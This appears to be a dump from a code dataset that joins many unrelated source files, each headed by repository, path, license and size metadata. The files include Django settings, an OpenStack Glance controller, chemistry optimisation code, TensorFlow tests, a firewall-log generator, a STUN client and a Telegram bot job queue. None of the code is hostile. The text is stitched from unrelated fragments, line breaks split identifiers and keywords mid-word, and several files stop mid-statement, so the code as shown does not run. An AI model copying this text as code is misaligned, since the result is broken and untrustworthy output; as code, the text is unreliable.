'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation
.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18
N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
openstack/glance
glance/api/v2/metadef_namespaces.py
Python
apache-2.0
38,490
0
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import http.client as http import urllib.parse as urlparse from oslo_config import cfg from oslo_log import log as logging from oslo_serialization import jsonutils from oslo_utils import encodeutils import webob.exc from wsme.rest import json from glance.api import policy from glance.api.v2.model.metadef_namespace import Namespace from glance.api.v2.model.metadef_namespace import Namespaces from glance.api.v2.model.metadef_object import MetadefObject from glance.api.v2.model.metadef_property_type import PropertyType from glance.api.v2.model.metadef_resource_type import ResourceTypeAssociation from glance.api.v2.model.metadef_tag import MetadefTag from glance.api.v2 import policy as api_policy from glance.common import exception from glance.common import utils from glance.common import wsgi from glance.common import wsme_utils import glance.db import glance.gateway from glance.i18n import _, _LE import glance.notifier import glance.schema LOG = logging.getLogger(__name__) CONF = cfg.CONF class NamespaceController(object): def __init__(self, db_api=None, policy_enforcer=None, notifier=None): self.db_api = db_api or glance.db.get_api() self.policy = policy_enforcer or policy.Enforcer() self.notifier = notifier or glance.notifier.Notifier() self.gateway = glance.gateway.Gateway(db_api=self.db_api, notifier=self.notifier, policy_enforcer=self.policy) self.n
s_schema_lin
k = '/v2/schemas/metadefs/namespace' self.obj_schema_link = '/v2/schemas/metadefs/object' self.tag_schema_link = '/v2/schemas/metadefs/tag' def index(self, req, marker=None, limit=None, sort_key='created_at', sort_dir='desc', filters=None): try: ns_repo = self.gateway.get_metadef_namespace_repo( req.context, authorization_layer=False) policy_check = api_policy.MetadefAPIPolicy( req.context, enforcer=self.policy) # NOTE(abhishekk): This is just a "do you have permission to # list namespace" check. Each namespace is checked against # get_metadef_namespace below. policy_check.get_metadef_namespaces() # NOTE(abhishekk): We also need to fetch resource_types associated # with namespaces, so better to check we have permission for the # same in advance. policy_check.list_metadef_resource_types() # Get namespace id if marker: namespace_obj = ns_repo.get(marker) marker = namespace_obj.namespace_id database_ns_list = ns_repo.list( marker=marker, limit=limit, sort_key=sort_key, sort_dir=sort_dir, filters=filters) ns_list = [ ns for ns in database_ns_list if api_policy.MetadefAPIPolicy( req.context, md_resource=ns, enforcer=self.policy).check( 'get_metadef_namespace')] rs_repo = ( self.gateway.get_metadef_resource_type_repo( req.context, authorization_layer=False)) for db_namespace in ns_list: # Get resource type associations filters = dict() filters['namespace'] = db_namespace.namespace repo_rs_type_list = rs_repo.list(filters=filters) resource_type_list = [ ResourceTypeAssociation.to_wsme_model( resource_type ) for resource_type in repo_rs_type_list] if resource_type_list: db_namespace.resource_type_associations = ( resource_type_list) namespace_list = [Namespace.to_wsme_model( db_namespace, get_namespace_href(db_namespace), self.ns_schema_link) for db_namespace in ns_list] namespaces = Namespaces() namespaces.namespaces = namespace_list if len(namespace_list) != 0 and len(namespace_list) == limit: namespaces.next = ns_list[-1].namespace except exception.Forbidden as e: LOG.debug("User not permitted to retrieve metadata namespaces " "index") raise webob.exc.HTTPForbidden(explanation=e.msg) except exception.NotFound as e: raise webob.exc.HTTPNotFound(explanation=e.msg) return namespaces @utils.mutating def create(self, req, namespace): try: namespace_created = False # Create Namespace ns_factory = self.gateway.get_metadef_namespace_factory( req.context, authorization_layer=False) ns_repo = self.gateway.get_metadef_namespace_repo( req.context, authorization_layer=False) # NOTE(abhishekk): Here we are going to check if user is authorized # to create namespace, resource_types, objects, properties etc. policy_check = api_policy.MetadefAPIPolicy( req.context, enforcer=self.policy) policy_check.add_metadef_namespace() if namespace.resource_type_associations: policy_check.add_metadef_resource_type_association() if namespace.objects: policy_check.add_metadef_object() if namespace.properties: policy_check.add_metadef_property() if namespace.tags: policy_check.add_metadef_tag() # NOTE(abhishekk): As we are getting rid of auth layer, this # is the place where we should add owner if it is not specified # in request. kwargs = namespace.to_dict() if 'owner' not in kwargs: kwargs.update({'owner': req.context.owner}) new_namespace = ns_factory.new_namespace(**kwargs) ns_repo.add(new_namespace) namespace_created = True # Create Resource Types if namespace.resource_type_associations: rs_factory = (self.gateway.get_metadef_resource_type_factory( req.context, authorization_layer=False)) rs_repo = self.gateway.get_metadef_resource_type_repo( req.context, authorization_layer=False) for resource_type in namespace.resource_type_associations: new_resource = rs_factory.new_resource_type( namespace=namespace.namespace, **resource_type.to_dict()) rs_repo.add(new_resource) # Create Objects if namespace.objects: object_factory = self.gateway.get_metadef_object_factory( req.context, authorization_layer=False) object_repo = self.gateway.get_metadef_object_repo( req.context, authorization_layer=False) for metadata_object in namespace.objects: new_meta_object = object_factory.new_object( namespace=namespace.namespace, **metadata_object.to_dict()) object_repo.add(new_meta_object) # Create Tags if namespace.tags: tag_factory = self.gateway.get_metadef_tag_factory( req.context, authorization_layer=False)
eljost/pysisyphus
pysisyphus/drivers/precon_pos_rot.py
Python
gpl-3.0
19,597
0.000714
# [1] https://doi.org/10.1002/jcc.26495 # Habershon, 2021 """ prp a901cdfacc579eb63b193cbc9043212e8b57746f pysis 340ab6105ac4156f0613b4d0e8f080d9f195530c do_trans accidentally disabled in transtorque """ from functools import reduce import itertools as it import numpy as np from pysisyphus.calculators import ( HardSphere, TransTorque, AtomAtomTransTorque, Composite, ) from pysisyphus.constants import BOHR2ANG from pysisyphus.Geometry import Geometry from pysisyphus.helpers import align_coords from pysisyphus.helpers_pure import highlight_text from pysisyphus.init_logging import init_logging from pysisyphus.intcoords.setup import get_fragments, get_bond_sets from pysisyphus.xyzloader import coords_to_trj, make_xyz_str init_logging() class SteepestDescent: def __init__( self, geom, max_cycles=1000, max_step=0.05, rms_force=0.05, rms_force_only=True, prefix=None, dump=False, print_mod=25, ): self.geom = geom self.max_cycles = max_cycles self.max_step = max_step self.rms_force = rms_force self.rms_force_only = rms_force_only self.prefix = prefix self.dump = dump self.print_mod = print_mod self.all_coords = np.zeros((max_cycles, self.geom.coords.size)) def run(self): coords = self.geom.coords.copy() to_dump = [] for i in range(self.max_cycles): self.all_coords[i] = coords.copy() if self.dump and (i % 100) == 0: to_dump.append(self.geom.as_xyz(cart_coords=coords)) results = self.geom.get_energy_and_forces_at(coords) forces = results["forces"] norm = np.linalg.norm(forces) rms = np.sqrt(np.mean(forces ** 2)) if rms <= self.rms_force: print(f"Converged in cycle {i}. Breaking.") break if i > 0: beta = forces.dot(forces) / self.prev_forces.dot(self.prev_forces) step = forces + beta * self.prev_step else: step = forces.copy() # step = forces.copy() step *= min(self.max_step / np.abs(step).max(), 1) if i % self.print_mod == 0: print( f"{i:03d}: |forces|={norm: >12.6f} " f"rms(forces)={np.sqrt(np.mean(forces**2)): >12.6f} " f"|step|={np.linalg.norm(step): >12.6f}" ) coords += step self.prev_step = step self.prev_forces = forces self.geom.coords = coords self.all_coords = self.all_coords[: i + 1] if to_dump: with open("optimization.trj", "w") as handle: handle.write("\n".join(to_dump)) def get_fragments_and_bonds(geoms): if isinstance(geoms, Geometry) or len(geoms) == 1: geom = geoms atoms = geom.atoms coords3d = geom.coords3d bonds = [frozenset(bond) for bond in get_bond_sets(atoms, coords3d)] fragments = get_fragments(atoms, coords3d.flatten(), bond_inds=bonds) frag_inds = list(it.chain(*fragments)) if len(frag_inds) != len(atoms): all_inds = list(range(len(atoms))) missing_inds = set(all_inds) - set(frag_inds) for mi in missing_inds: fragments.append(frozenset((mi,))) frag_bonds = [ list(filter(lambda bond: bond <= frag, bonds)) for frag in fragments ] # frag_atoms = [[a for i, a in enumerate(atoms) if i in frag] for frag in fragments] # Assert that we do not have any interfragment bonds assert reduce((lambda x, y: x + len(y)), frag_bonds, 0) == len(bonds) union_geom = geom.copy(coord_type="cart") else: # Form union, determine consistent new indices for all atoms and calculate bonds raise Exception() # return fragments, frag_bonds, set(bonds), frag_atoms return fragments, frag_bonds, set(bonds), union_geom def get_rot_mat(coords3d_1, coords3d_2, center=False): coords3d_1 = coords3d_1.copy().reshape(-1, 3) coords3d_2 = coords3d_2.copy().reshape(-1, 3) def _center(coords3d): return coords3d - coords3d.mean(axis=0) if center: coords3d_1 = _center(coords3d_1) coords3d_2 = _center(coords3d_2) tmp_mat = coords3d_1.T.dot(coords3d_2) U, W, Vt = np.linalg.svd(tmp_mat) rot_mat = U.dot(Vt) # Avoid reflections if np.linalg.det(rot_mat) < 0: U[:, -1] *= -1 rot_mat = U.dot(Vt) return rot_mat def get_steps_to_active_atom_mean( frag_lists, iter_frag_lists, ind_dict, coords3d, skip=True ): frag_num = len(frag_lists) steps = np.zeros((frag_num, 3)) for m, frag_m in enumerate(frag_lists): step_m = np.zeros(3) for n, _ in enumerate(iter_frag_lists): if skip and m == n: continue active_inds = ind_dict[(n, m)] if len(active_inds) == 0: continue step_m += coords3d[active_inds].mean(axis=0) step_m /= frag_num steps[m] = step_m return steps def report_frags(rgeom, pgeom, rfrags, pfrags, rbond_diff, pbond_diff): for name, geom in (("Reactant(s)", rgeom), ("Product(s)", pgeom)): print(f"{name}: {geom}\n\n{geom.as_xyz()}\n") def get_frag_atoms(geom, frag): atoms = geom.atoms return [atoms[i] for i in frag] for name, geom, frags in (("reactant", rgeom, rfrags), ("product", pgeom, pfrags)): print(f"{len(frags)} Fragment(s) in {name} image:\n") for frag in frags: frag_atoms = get_frag_atoms(geom, frag) frag_coords = geom.coords3d[list(frag)] frag_xyz = make_xyz_str(frag_atoms, frag_coords * BOHR2ANG) print(frag_xyz + "\n") def print_bonds(geom, bonds): for from_, to_ in bonds: from_atom, to_atom = [geom.atoms[i] for i in (from_, to_)] print(f"\t({from_: >3d}{from_atom} - {to_: >3d}{to_atom})") print("Bonds broken in reactant image:") print_bonds(rgeom, rbond_diff) print() print("Bonds formed in product image:") print_bonds(pgeom, pbond_diff) print() def report_mats(name, mats): for (m, n), indices in mats.items(): print(f"{name}({m}, {n}): {indices}") print() def center_fragments(frag_list, geom): c3d = geom.coords3d for frag in frag_list: mean = c3d[frag].mean(axis=0) c3d[frag] -= mean[None, :] def get_which_frag(frags): which_frag = dict() for frag_ind, frag in enumerate(frags): which_frag.update({atom_ind: frag_ind for atom_ind in frag}) return which_frag def form_A(frags, which_frag, formed_bonds): """Construct the A-matrices. AR[(m, n)] (AP[(m, n)]) contains the subset of atoms in Rm (Pm) that forms bonds with Rn (Pn). """ A = dict() for m, n in formed_bonds: key = (which_frag[m], which_frag[n]) A.setdefault(key, list()).append(m) A.setdefault(key[::-1], list()).append(n) return A CONFIG = { "s2_hs_kappa": 1.0, "s4_hs_kappa": 50.0, "s4_v_kappa": 1.0,
"s4_w_kappa": 1.0, "s5_v_kappa": 1.0, "s5_w_kappa": 3.0, "s5_hs_kappa": 10.0, "s5_z_kappa": 2.0, "s5_trans": True, "s5_rms_force": 0.01, } def precon_pos_rot(reactants, products, prefix=None, config=CONFIG): c = config if prefix is None: prefix = "" def make_fn(
fn): return prefix + fn rfrags, rfrag_bonds, rbonds, runion = get_fragments_and_bonds(reactants) pfrags, pfrag_bonds, pbonds, punion = get_fragments_and_bonds(products) pbond_diff = pbonds - rbonds # Present in product(s) rbond_diff = rbonds - pbonds # Present in reactant(s) involved_atoms = set(tuple(it.chain(*pbond_diff))) involved_atoms |= set(tuple(it.chain(*rbond_diff))) which_rfrag = get_which_frag(rfrags) which_pfrag = get_which_frag(pfrags) rfrag_lists = [list(frag) for frag in rfrags] pfrag_lists = [list(frag) f
bryanveloso/avalonstar-tv
apps/broadcasts/migrations/0002_auto_20140927_0415.py
Python
apache-2.0
627
0.001595
# -
*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('broadcasts', '0001_initial'), ] operations = [ migrations.AlterField( model_name='broadcast', name='series', field=models.ForeignKey(related_name=b'broadcasts', blank=True, to='broadcasts.Series', null=True), ), migrations.Alter
Field( model_name='broadcast', name='status', field=models.CharField(max_length=200, blank=True), ), ]
secnot/tutorial-tienda-django-paypal-1
tiendalibros/tiendalibros/wsgi.py
Python
gpl-3.0
401
0
""" WSGI config for tiendalibros project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.
com/en/1.8/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJ
ANGO_SETTINGS_MODULE", "tiendalibros.settings") application = get_wsgi_application()
sarbi127/inviwo
data/scripts/camerarotation.py
Python
bsd-2-clause
687
0.040757
# Inviwo Python script import inviwo import math import time start = time.clock() scale = 1; d = 15 steps = 120 for i in range(0, steps):
r = (2 * 3.14 * i) / steps x = d*math.sin(r) z = -d*math.cos(r) inviwo.setPropertyValue("EntryExitPoints.camera",((x*scale,3*scale,z*scale),(0,0,0),(0,1,0))) for i in range(0, steps): r = (2 * 3.14 * i) / (steps) x = 1.0*math.sin(r) z = 1.0*math.cos(r) inviwo.setCameraUp("EntryExitPoints.camera",(x*scale,z*scale,0)) end = time.clock() fps = 2*steps / (end - start) fps = round(fps,3) print(
"Frames per second: " + str(fps)) print("Time per frame: " + str(round(1000/fps,1)) + " ms")
google/spectral-density
tf/experiment_utils_test.py
Python
apache-2.0
3,931
0.005342
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for experiment utils.""" import numpy as np import os import tempfile import tensorflow as tf import experiment_utils class AsymmetricSaverTest(tf.test.TestCase): """Tests for asymmetric saver.""" def test_save_restore(self): x = tf.get_variable('x', []) y = tf.get_variable('y', []) x_dir = tempfile.mkdtemp() y_dir = tempfile.mkdtemp() x_checkpoint_base = os.path.join(x_dir, 'model.ckpt') y_checkpoint_base = os.path.join(y_dir, 'model.ckpt') normal_saver = tf.train.Saver([x, y]) # Save a checkpoint into y_dir first. with self.test_session() as sess: sess.run(tf.global_variables_initializer()) normal_saver.save(sess, y_checkpoint_base, global_step=0) saver = experiment_utils.AsymmetricSaver( [x], [experiment_utils.RestoreSpec( [y], os.path.join(y_dir, 'model.ckpt-0'))]) # Write an x checkpoint. with self.test_session() as sess: sess.run(tf.global_variables_initializer()) x_initial, y_initial = sess.run([x, y]) saver.save(sess, x_checkpoint_base) # Load using AsymmetricSaver. with self.test_session() as sess: sess.run(tf.global_variables_initializer()) saver.restore(sess, tf.train.latest_checkpoint(x_dir)) x_final, y_final = sess.run([x, y]) # Make sure that x is loaded correctly from checkpoint, and that y # isn't. self.assertEqual(x_initial, x_final) self.assertNotAllClose(y_initial, y_final) class FilterNormalizationTest(tf.test.TestCase): def test_basic(self): u = tf.get_variable('abcdef/weights', shape=[7, 5, 3, 2]) v = tf.get_variable('abcdef/biases', shape=[2]) w = tf.get_variable('unpaired/weights', shape=[7, 5, 3, 2]) x = tf.get_variable('untouched', shape=[]) normalize_ops = experiment_utils.normalize_all_filters( tf.trainable_variables()) with self.test_session() as sess: sess.run(tf.global_variables_initializer()) u_initial, v_initial, w_initial, x_initial = sess.run([u, v, w, x
]) sess.run(normalize_ops) u_final, v_final, w_final, x_final = sess.run([u, v, w, x]) u_norms = np.sq
rt(np.sum(np.square(u_initial), axis=(0, 1, 2))) w_norms = np.sqrt(np.sum(np.square(w_initial), axis=(0, 1, 2))) # We expect that the abcdef weights are normalized in pairs, that # the unpaired weights are normalized on their own, and the # untouched weights are in fact untouched. self.assertAllClose(np.array(u_final * u_norms), u_initial) self.assertAllClose(np.array(v_final * u_norms), v_initial) self.assertAllClose(np.array(w_final * w_norms), w_initial) self.assertAllClose(x_initial, x_final) class AssignmentHelperTest(tf.test.TestCase): def test_basic(self): x = tf.get_variable('x', shape=[2, 3]) y = tf.get_variable('y', shape=[4]) tf.get_variable('z', shape=[5, 6]) helper = experiment_utils.AssignmentHelper([x, y]) with self.test_session() as sess: helper.assign(np.arange(10.0), sess) self.assertAllClose(sess.run(x), [[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]]) self.assertAllClose(sess.run(y), [6.0, 7.0, 8.0, 9.0]) self.assertAllClose( helper.retrieve(sess), [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0]) if __name__ == '__main__': tf.test.main()
jpacerqueira/jpac-flume-logs
generator/gen_events.py
Python
apache-2.0
1,662
0.015042
#!/usr/bin/python ''' This script is used to generate a set of random-ish events to simulate log data from a Juniper Netscreen FW. It was built around using netcat to feed data into Flume for ingestion into a Hadoop cluster. Once you have Flume configured you would use the following command to populate data: ./gen_events.py 2>&1 | nc 127.0.0.1 9999 ''' import random from netaddr import * from time impo
rt sleep protocols = ['6', '17'] common_ports = ['20','21','22','23','25','80','109','110','119','143','156','161','389','443
'] action_list = ['Deny', 'Accept', 'Drop', 'Reject']; src_network = IPNetwork('192.168.1.0/24') dest_network = IPNetwork('172.35.0.0/16') fo = open("replay_log.txt", "w") while (1 == 1): proto_index = random.randint(0,1) protocol = protocols[proto_index] src_port_index = random.randint(0,13) dest_port_index = random.randint(0,13) src_port = common_ports[src_port_index] dest_port = common_ports[dest_port_index] action_index = random.randint(0,3) action = action_list[action_index] src_ip_index = random.randint(1,254) src_ip = src_network[src_ip_index] dest_ip_index = random.randint(1,65535) dest_ip = dest_network[dest_ip_index] event = "192.168.1.3 Netscreen-FW1: NetScreen device_id=Netscreen-FW1 [Root]system-notification-00257(traffic): start_time=\"YYYY-MM-DD HH:MM:SS\" duration=0 policy_id=125 service=syslog proto=%s src zone=Untrust dst zone=Trust action=%s sent=0 rcvd=0 src=%s dst=%s src_port=%s dst_port=%s session_id=0" % (protocol, action, src_ip, dest_ip, src_port, dest_port) fo.write(event + "\n") print event sleep(0.3) fo.close()
nthiep/global-ssh
gosh/stun.py
Python
agpl-3.0
4,914
0.037241
import struct, socket, time, logging from gosh.config import STUN_SERVER, STUN_PORT, logger from gosh import JsonSocket #============================================================================= # STUN Client # ============================================================================ class StunClient(object): ## defined protocol TCP='TCP' UDP='UDP' def __init__(self, pro): self.tcp=False if pro == 'TCP': self.tcp = True self.port = None else: self.sock = None def NAT_Behavior_Discovery(self): mapping = self.mapping_behavior() if self.tcp: self.port = None elif self.sock: self.sock.close() self.sock = None if self.tcp: filtering = 0 else: filtering = self.filtering_behavior() if self.sock: self.sock.close() self.sock = None return mapping, filtering def CreateMessage(self, changeip=False, changeport=False): """ create message binding request""" data = {} data["STUN-TYPE"] = 'BIN
DING_REQUEST' data["CHANGE-REQUEST"] = 'CHANGE-REQUEST' data["CHANGE-IP"] = changeip d
ata["CHANGE-PORT"] = changeport return data def binding_request(self, server, port, request, mapping=False): """ check nat type """ udpconnect = False if self.tcp: self.sock = JsonSocket(JsonSocket.TCP) self.sock.set_reuseaddr() if self.port: self.sock.bind(self.port) logger.debug("binding_request: Bind on port %d" %self.port) else: self.port = self.sock.bind(0) else: if not self.sock: self.sock = JsonSocket(JsonSocket.UDP) if mapping: udpconnect = True self.sock.set_timeout(3) if self.sock.connect(server, port, udpconnect): self.sock.send_obj(request) try: data = self.sock.read_obj() except Exception, e: logger.debug("binding_request: %s" %e) return False self.local_addr = self.sock.getsockname() logger.debug("binding_request: Local address %s:%d" %self.local_addr) if self.tcp: self.sock.close() else: self.sock.set_timeout(None) if 'BINDING-RESPONSE' in data: return False return data return False def mapping_behavior(self): """ mapping behavior testing nat """ message = self.CreateMessage() data = self.binding_request(STUN_SERVER, STUN_PORT, message, True) if not data: return False #============================================= # TEST I # ============================================ logger.debug("mapping_behavior: TEST_I") LOCAL_ADDR = "%s:%d" % self.local_addr TEST_I = data['XOR-MAPPED-ADDRESS'] logger.debug("mapping_behavior: Public IP %s"%TEST_I) OTHER_SERVER, OTHER_PORT = data['OTHER-ADDRESS'].split(":") if LOCAL_ADDR == TEST_I: return 10 else: #============================================= # TEST II # ============================================ logger.debug("mapping_behavior: TEST_II") message = self.CreateMessage() data = self.binding_request(OTHER_SERVER, STUN_PORT, message, True) if not data: return False TEST_II = data['XOR-MAPPED-ADDRESS'] logger.debug("mapping_behavior: Public IP %s"%TEST_II) if TEST_I == TEST_II: return 1 else: #============================================= # TEST III # ============================================ logger.debug("mapping_behavior: TEST_III") message = self.CreateMessage() data = self.binding_request(OTHER_SERVER, int(OTHER_PORT), message, True) if not data: return False TEST_III = data['XOR-MAPPED-ADDRESS'] logger.debug("mapping_behavior: Public IP %s"%TEST_III) if TEST_II == TEST_III: return 2 else: if self.tcp: port1 = int(TEST_I.split(":")[1]) port2 = int(TEST_II.split(":")[1]) port3 = int(TEST_III.split(":")[1]) if abs(port2-port1) < 5 and abs(port3-port1) <5: if port1 < port2 < port3: return 4 elif port1 > port2 > port3: return 5 return 3 def filtering_behavior(self): """ filtering behavior testing nat """ #============================================= # TEST I # ============================================ logger.debug("filtering_behavior: TEST_I") message = self.CreateMessage() data = self.binding_request(STUN_SERVER, STUN_PORT, message) if not data: return False #============================================= # TEST II # ============================================ logger.debug("filtering_behavior: TEST_II") message = self.CreateMessage(changeip=True, changeport=True) data = self.binding_request(STUN_SERVER, STUN_PORT, message) if data: return 1 else: logger.debug("filtering_behavior: TEST_III") #============================================= # TEST III # ============================================ message = self.CreateMessage(changeip=False, changeport=True) data = self.binding_request(STUN_SERVER, STUN_PORT, message) if data: return 2 else: return 3
underbluewaters/marinemap
lingcod/news/urls.py
Python
bsd-3-clause
788
0.006345
from dja
ngo.conf.urls.defaults import * from models import Entry, Tag from django.views.generic.dates import ArchiveIndexView, DateDetailView from django.views.generic import TemplateView urlpatterns = patterns('', url(r'^/?$', ArchiveIndexView.as_view(model=Entry, date_field="published_on"), name="news-main"), # url(r'^(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[0-9A-Za-z-]+)/$', 'date_based.object_detail', dict(entry_dict, slug_field='slug', month_format='%m'),name="new
s-detail"), url(r'^(?P<year>\d+)/(?P<month>[-\w]+)/(?P<day>\d+)/(?P<pk>\d+)/$', DateDetailView.as_view(model=Entry, date_field="published_on"), name="news_detail"), url(r'^about/$', TemplateView.as_view(template_name='news/about.html'), name='news-about'), )
alexander-matsievsky/HackerRank
All_Domains/Python/Collections/word-order.py
Python
mit
269
0
from collecti
ons import OrderedDict n = int(input()) occurrences = OrderedDict() for _ in range(0, n): word = input().strip() occ
urrences[word] = occurrences.get(word, 0) + 1 print(len(occurrences)) print(sep=' ', *[count for _, count in occurrences.items()])
tarmstrong/nbdiff
tests/test_git_adapter.py
Python
mit
3,720
0
from nbdiff.adapter import git_adapter as g from pretend import stub def test_get_modified_notebooks_empty(): g.subprocess = stub(check_output=lambda cmd: 'true\n' if '--is-inside-work-tree' in cmd else '') adapter = g.GitAdapter() result = adapter.get_modified_notebooks() assert result == [] def test_get_modified_notebooks_deleted(): adapter = g.GitAdapter() def check_output_stub(cmd): if '--modified' in cmd: output = '''foo.ipynb bar.ipynb foo.txt baz.ipynb ''' return output elif '--unmerged' in cmd: return ''.join([ '100755\thash\t{i}\tfoo.ipynb\n' for i in [1, 2, 3] ]) elif '--is-inside-work-tree' in cmd: return 'true\n' elif '--show-toplevel' in cmd: return '/home/user/Documents' def popen(*args, **kwargs): return stub(stdout=stub(read=lambda: "")) g.open = lambda fname: stub(read=lambda: "") g.subprocess = stub( check_output=check_output_stub, PIPE='foo', Popen=popen, ) g.os.path.exists = lambda path: 'bar.ipynb' in path result = adapter.get_modified_notebooks() assert result[0][2] == 'bar.ipynb'
assert len(result) == 1 def test_get_modified_notebooks(): adapter = g.GitA
dapter() def check_output_stub(cmd): if '--modified' in cmd: output = '''foo.ipynb bar.ipynb foo.txt baz.ipynb ''' return output elif '--unmerged' in cmd: return ''.join([ '100755\thash\t{i}\tfoo.ipynb\n' for i in [1, 2, 3] ]) elif '--is-inside-work-tree' in cmd: return 'true\n' elif '--show-toplevel' in cmd: return '/home/user/Documents' def popen(*args, **kwargs): return stub(stdout=stub(read=lambda: "")) g.open = lambda fname: stub(read=lambda: "") g.subprocess = stub( check_output=check_output_stub, PIPE='foo', Popen=popen, ) g.os.path.exists = lambda path: True result = adapter.get_modified_notebooks() assert result[0][2] == 'bar.ipynb' assert result[1][2] == 'baz.ipynb' assert len(result) == 2 def test_get_unmerged_notebooks_empty(): g.subprocess = stub(check_output=lambda cmd: 'true\n' if '--is-inside-work-tree' in cmd else '') adapter = g.GitAdapter() result = adapter.get_unmerged_notebooks() assert result == [] def test_get_unmerged_notebooks(): adapter = g.GitAdapter() def check_output_stub(cmd): if '--unmerged' in cmd: f1 = ''.join([ '100755\thash\t{i}\tfoo.ipynb\n' for i in [1, 2, 3] ]) f2 = ''.join([ '100755\thash\t{i}\tbar.ipynb\n' for i in [1, 2, 3] ]) f3 = ''.join([ '100755\thash\t{i}\tfoo.py\n' for i in [1, 2, 3] ]) return f1 + f2 + f3 elif '--is-inside-work-tree' in cmd: return 'true\n' elif '--show-toplevel' in cmd: return '/home/user/Documents' def popen(*args, **kwargs): return stub(stdout=stub(read=lambda: "")) g.open = lambda fname: stub(read=lambda: "") g.subprocess = stub( check_output=check_output_stub, PIPE='foo', Popen=popen, ) result = adapter.get_unmerged_notebooks() assert len(result) == 2 assert result[0][3] == '/home/user/Documents/foo.ipynb' assert result[1][3] == '/home/user/Documents/bar.ipynb'
rogerscristo/BotFWD
env/lib/python3.6/site-packages/telegram/ext/jobqueue.py
Python
mit
20,684
0.004448
#!/usr/bin/env python # flake8: noqa E501 # # A library that provides a Python interface to the Telegram Bot API # Copyright (C) 2015-2017 # Leandro Toledo de Souza <devs@python-telegram-bot.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser Public License for more details. # # You should have received a copy of the GNU Lesser Public License # along with this program. If not, see [http://www.gnu.org/licenses/]. """This module contains the classes JobQueue and Job.""" import logging import time import warnings import datetime import weakref from numbers import Number from threading import Thread, Lock, Event from queue import PriorityQueue, Empty class Days(object): MON, TUE, WED, THU, FRI, SAT, SUN = range(7) EVERY_DAY = tuple(range(7)) class JobQueue(object): """This class allows you to periodically perform tasks with the bot. Attributes: queue (:obj:`PriorityQueue`): The queue that holds the Jobs. bot (:class:`telegram.Bot`): Bot that's send to the handlers. Args: bot (:class:`telegram.Bot`): The bot instance that should be passed to the jobs. Deprecated: prevent_autostart (:obj:`bool`, optional): Thread does not start during initialisation. Use `start` method instead. """ def __init__(self, bot, prevent_autostart=None): if prevent_autostart is not None: warnings.warn("prevent_autostart is being deprecated, use `start` method instead.") self.queue = PriorityQueue() self.bot =
bot self.logger = logging.getLogger(self.__class__.__name__) self.__start_lock = Lock() self.__next_peek_lock = Lock() # to protect self._next_peek & self.__tick self.__tick = Event() self.__thread = None self._next_peek = None self._running = False def put(self, job, next_t=None): """Queue a new job. Note
: This method is deprecated. Please use: :attr:`run_once`, :attr:`run_daily` or :attr:`run_repeating` instead. Args: job (:class:`telegram.ext.Job`): The ``Job`` instance representing the new job. next_t (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional): Time in or at which the job should run for the first time. This parameter will be interpreted depending on its type. * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the job should run. * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the job should run. * :obj:`datetime.datetime` will be interpreted as a specific date and time at which the job should run. * :obj:`datetime.time` will be interpreted as a specific time at which the job should run. This could be either today or, if the time has already passed, tomorrow. """ warnings.warn("'JobQueue.put' is being deprecated, use 'JobQueue.run_once', " "'JobQueue.run_daily' or 'JobQueue.run_repeating' instead") if job.job_queue is None: job.job_queue = self self._put(job, next_t=next_t) def _put(self, job, next_t=None, last_t=None): if next_t is None: next_t = job.interval if next_t is None: raise ValueError('next_t is None') if isinstance(next_t, datetime.datetime): next_t = (next_t - datetime.datetime.now()).total_seconds() elif isinstance(next_t, datetime.time): next_datetime = datetime.datetime.combine(datetime.date.today(), next_t) if datetime.datetime.now().time() > next_t: next_datetime += datetime.timedelta(days=1) next_t = (next_datetime - datetime.datetime.now()).total_seconds() elif isinstance(next_t, datetime.timedelta): next_t = next_t.total_seconds() next_t += last_t or time.time() self.logger.debug('Putting job %s with t=%f', job.name, next_t) self.queue.put((next_t, job)) # Wake up the loop if this job should be executed next self._set_next_peek(next_t) def run_once(self, callback, when, context=None, name=None): """Creates a new ``Job`` that runs once and adds it to the queue. Args: callback (:obj:`callable`): The callback function that should be executed by the new job. It should take ``bot, job`` as parameters, where ``job`` is the :class:`telegram.ext.Job` instance. It can be used to access it's ``job.context`` or change it to a repeating job. when (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | 